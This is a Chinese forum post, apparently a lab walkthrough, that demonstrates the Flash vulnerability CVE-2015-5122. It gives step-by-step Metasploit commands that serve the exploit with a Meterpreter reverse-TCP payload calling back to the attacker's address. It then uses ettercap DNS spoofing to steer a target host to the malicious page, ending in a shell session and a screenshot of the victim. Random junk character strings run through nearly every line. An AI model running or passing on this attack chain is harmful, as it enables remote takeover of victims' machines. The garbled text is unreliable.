中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

$ z8 D) H5 R7 x' q 二、cve2015-5122漏洞实例演示虚拟机 C _$ E- \4 }! \

5 A n$ I) `1 L3 }

N* c0 s# A! b   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: , Q' u3 }+ S: x- ^

2 n$ k; {( e' K. j. _2 X- D8 a

) V6 T7 E6 @ U' Q9 S: e search cve-2015-5122如图: " F7 d* t. U# {# Z) V( E L$ t

, P# s% A4 Z. Z# G9 I

; P% {7 Z6 @- `/ W   7 {. c6 D% O; ?2 p, p: t

1 o2 j; ]- z% `/ ^

2 v0 e+ j( l3 a/ Y% S2 } 下面我们敲如下命令: [# |6 j! n1 G0 `! _ e$ G" k

$ o9 s: }2 _+ W) y$ _7 ^; ^

3 V( j" E5 f! {: X0 `! R use exploit/multi/browser/adobe_flash_opaque_background_uaf * @/ f/ U7 p6 Y8 ?

7 J. L' F! F2 [7 W0 b7 ^

3 d+ W1 |6 R+ |2 _ set PAYLOAD windows/meterpreter/reverse_tcp 0 c" R. I& H! k5 I6 v( e9 [+ [

0 U* ]: Q% w6 X s) Z

4 [ X$ j) i9 P3 u9 ? set LHOST 192.168.0.109 + o9 B. f4 g7 { h( ]

. L( V$ |, m0 v( `

! p6 H6 `4 g5 s0 G. [ set URIPATH /                        /*根目录*/ c3 i% {/ s3 R* I/ ?

! E% ~9 G& }& H6 X8 q* [( [0 A) {

- k C6 m: B4 Y' Z( }) N8 } set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 . b# i+ M1 O, P5 p" Y1 y

, T. U- \% a+ C6 i

, ^ @7 g0 C; v7 l/ C6 D# L& T set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 Y0 Q m0 N) N" D: D8 Q

4 P* P; W, T# H

- ~, B( E- g7 K" x- }& r 然后show options如图: % y! d+ G7 c6 O* p

- k% L: |) I( d& d

* O8 \ O" O1 F   * c0 ^3 Q6 `# h& \; _7 `

. \7 J/ Z: s: {7 E( o# u

, |1 x% v. n' Y, ~; ?" t* H4 z M6 q 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
( a* c8 v" ^/ W7 _! [
4 P# O. b2 \+ u

' B/ i ~- O' I5 v

9 c+ C3 S0 Y. O6 D 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ' H k- z5 {+ h. f

0 {7 p$ n" {" y: x. X6 g. {" L) d7 n

8 J- Q( a8 w& M8 } Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf - D7 K2 x& e! @) e; m. P

, ~' U! S0 k7 p% u1 z5 x

* N9 C7 L" k, l   / x4 [4 m6 ~1 U! R/ l9 O% h. H9 K

7 d0 T) F1 W3 W N% C. Z% `* o

( a9 y- p6 [! [$ l 成功了,这时候我们断开ettercap,如图: 8 F! c: W/ e7 U4 K2 V7 j

; F( |0 @$ @* m2 g, ^6 j4 W$ r

, w1 X3 v( F) `$ f2 c$ r! z& w   # [0 \( T4 z1 z! z

8 j7 y3 g m* {& `) F* Y

$ Z2 j& k2 [$ |, k# Y; |, N Screenshot如图: 5 ?5 R7 p/ G- i

$ \) S0 N- s+ y; h: L* U0 B

& C- k0 C8 V, g/ G; M, i2 t2 U   ( k, j6 R! a( ?

0 C! {6 n3 f0 k4 |, O! {

7 ?" V7 q) q+ l" L. B p : [+ v/ B. x' O G/ X* e: f+ L8 I






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2